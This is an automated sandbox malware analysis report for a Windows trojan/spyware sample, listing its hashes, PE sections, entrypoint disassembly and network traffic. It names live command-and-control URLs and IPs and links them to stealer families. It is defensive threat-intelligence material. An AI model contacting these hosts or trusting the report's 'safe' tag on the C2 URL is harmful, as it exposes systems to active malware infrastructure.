http://html4/loose.dtd	HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
https://httpbin.org/ipbefore	HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/http-cookies.html	HGFSqmKwd5.exe, HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/hsts.html#	HGFSqmKwd5.exe	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS	HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963	HGFSqmKwd5.exe, 00000000.00000003.1445744019.0000000001CE2000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1484031657.0000000001CE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.css	HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=	HGFSqmKwd5.exe, 00000000.00000002.1484368647.0000000001D63000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1444930482.0000000001D63000.00000004.00000020.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000003.1444792515.0000000001D63000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	HGFSqmKwd5.exe, 00000000.00000003.1347146864.00000000077A0000.00000004.00001000.00020000.00000000.sdmp, HGFSqmKwd5.exe, 00000000.00000002.1482231895.0000000001371000.00000040.00000001.01000000.00000003.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.226.108.155	httpbin.org	United States		14618	AMAZON-AESUS	false
81.29.149.125	home.fiveth5ht.top	Switzerland		39616	COMUNICA_IT_SERVICESCH	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581605
Start date and time:	2024-12-28 09:47:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	HGFSqmKwd5.exe renamed because original name is a hash value
Original Sample Name:	23a5d24635b116f7ff8a1835275027de.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:48:25	API Interceptor	3x Sleep call for process: HGFSqmKwd5.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.226.108.155	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse
	OAKPYEH4c6.exe	Get hash	malicious	LummaC	Browse
	ZTM2pfyhu3.exe	Get hash	malicious	LummaC	Browse
81.29.149.125	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
s-part-0035.t-0009.t-msedge.net	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	13.107.246.63
	TbxHhK6lsS.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	MrIOYC1Pns.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	jPJaszTDNt.exe	Get hash	malicious	Unknown	Browse	13.107.246.63
	http://track.rbfcu.org/y.z?l=https://google.com/amp/s/t.ly/5SpZS&r=14387614172&d=18473&p=2&t=h	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUMFBJSDkxQ0w3VVZMNFJFUlNDRVkyU05CUi4u	Get hash	malicious	HTMLPhisher	Browse	13.107.246.63
	eYAXkcBRfQ.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	JpzbUfhXi0.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	13.107.246.63
	LPO-0048532025.lnk	Get hash	malicious	DarkVision Rat	Browse	13.107.246.63
home.fiveth5ht.top	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	f7qbEfJl0B.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	5KwhHEdmM4.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	dZsdMl5Pwl.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	BkB1ur7aFW.exe	Get hash	malicious	Unknown	Browse	5.101.3.217
	OoYYtngD7d.exe	Get hash	malicious	Unknown	Browse	5.101.3.217

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COMUNICA_IT_SERVICESCH	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	81.29.149.125
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RHADAMANTHYS	Browse	81.29.149.45
	hmips.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	ppc.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	mips.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
	x86.elf	Get hash	malicious	Unknown	Browse	81.29.149.178
AMAZON-AESUS	QMtCX5RLOP.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	es5qBEFupj.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	s8kPMNXOZY.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	vUcZzNWkKc.exe	Get hash	malicious	LummaC	Browse	3.218.7.103
	GjZewfxHTi.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	34.226.108.155
	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	34.226.108.155
	xdeRtWCeNH.exe	Get hash	malicious	Unknown	Browse	3.218.7.103
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	54.225.146.64

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.986978998263652
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HGFSqmKwd5.exe
File size:	4'491'776 bytes
MD5:	23a5d24635b116f7ff8a1835275027de
SHA1:	3a47b6b89b789387e951e452ca2bf169c4cd0c3a
SHA256:	897b0a99718bb1cb83242a09fa9542572aae3a5d2d4a5c90b6bb4be334131876
SHA512:	d4ebdedab89e6a85457c7ffa5407cbfb199b7ba117ef49c1c8027abaeb5c56cb3c532dd1739b755df5157811fbc7d18e9f95e0d011f94825403090d714663677
SSDEEP:	98304:6EY9Gce3J/R37n7jcZOcLPGObJjGk1m1S0H2Ue0K7JDDYkpq+FUpJQpH:qGR3J/R3r7j8ObObJjGGOLWj17J/t8+V
TLSH:	F92633BE8134111CD6BE67BA5F8E3C50F2E8D1B76DC40788FACD9A3C45B7185A786818
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2...`....... I...@...................................D...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x1036000
Entrypoint Section:	.taggant
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE
Time Stamp:	0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp 00007F4464B3998Ah
punpckhbw mm0, qword ptr [eax+eax+00h]
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+0Ah], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or ecx, dword ptr [edx]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6dd05f	0x73	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6dc000	0x1ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x708a00	0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc340bc	0x10	vnhasopu
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3406c	0x18	vnhasopu
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x6db000	0x288a00	31b5b61fdd101588858e2ec82c54f162	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6dc000	0x1ac	0x200	42185c8e7035add5c2983dd59c3b7bcb	False	0.58203125	data	4.580921044862718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6dd000	0x1000	0x200	6363462e4ea156e03144265f6be7871e	False	0.166015625	data	1.1763897754724144	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6de000	0x39a000	0x200	702251036a79f4939233f2d70e67c1d5	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vnhasopu	0xa78000	0x1bd000	0x1bc400	c2dc4cde5afb90bdc15a7eb123bc2524	False	0.994379132667417	data	7.955555912255795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cudpjwpv	0xc35000	0x1000	0x400	80b9c03409d8e44891398b6a641d29c0	False	0.7060546875	data	5.761865221944657	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0xc36000	0x3000	0x2200	aedac82e76e881caba03875cde659a42	False	0.06916360294117647	DOS executable (COM)	0.8966711769345794	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0xc340cc	0x152	ASCII text, with CRLF line terminators			0.6479289940828402

Imports

DLL	Import
kernel32.dll	lstrcpy

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:48:20.194206953 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:20.194267988 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:20.194375992 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:20.206557035 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:20.206583977 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:21.941540956 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:21.942157030 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:21.942183971 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:21.943614006 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:21.943681002 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:21.955243111 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:21.955384970 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:21.955429077 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:22.006083965 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:22.006102085 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:22.052952051 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:22.275482893 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:22.275640011 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:22.275712013 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:22.286663055 CET	49719	443	192.168.2.10	34.226.108.155
Dec 28, 2024 09:48:22.286686897 CET	443	49719	34.226.108.155	192.168.2.10
Dec 28, 2024 09:48:24.731333971 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.850914001 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.851151943 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.852369070 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.972019911 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972038031 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972089052 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972105026 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.972166061 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972179890 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972183943 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.972217083 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.972222090 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972274065 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972280979 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.972285986 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972333908 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:24.972379923 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972393036 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:24.972438097 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.091926098 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.091941118 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.092010975 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.092065096 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.092077971 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.092098951 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.092134953 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.092149973 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.092206955 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.092292070 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.140614033 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.140711069 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.255085945 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.255285025 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.303217888 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.415164948 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.415322065 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.615390062 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.615566015 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.832901001 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.833069086 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.833180904 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.952802896 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.952817917 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.952877998 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.952892065 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.952934027 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.952931881 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.952951908 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.952985048 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.952992916 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.952999115 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953001976 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953044891 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953047991 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953057051 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953095913 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953152895 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953162909 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953192949 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953217983 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953305006 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953352928 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953412056 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953460932 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953541040 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953583002 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.953589916 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953599930 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953639984 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953674078 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953757048 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953826904 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953984022 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.953994036 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954037905 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954104900 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954186916 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954247952 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954257011 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954308033 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954426050 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954493999 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.954554081 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.962704897 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:25.995141029 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:25.995203018 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.072546005 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.072613955 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.072619915 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.072659969 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.072664976 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.072711945 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.072757006 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.072837114 CET	49729	80	192.168.2.10	81.29.149.125
Dec 28, 2024 09:48:26.072887897 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.072978020 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073057890 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073143005 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073240995 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073291063 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073370934 CET	80	49729	81.29.149.125	192.168.2.10
Dec 28, 2024 09:48:26.073465109 CET	80	49729	81.29.149.125	192.168.2.10
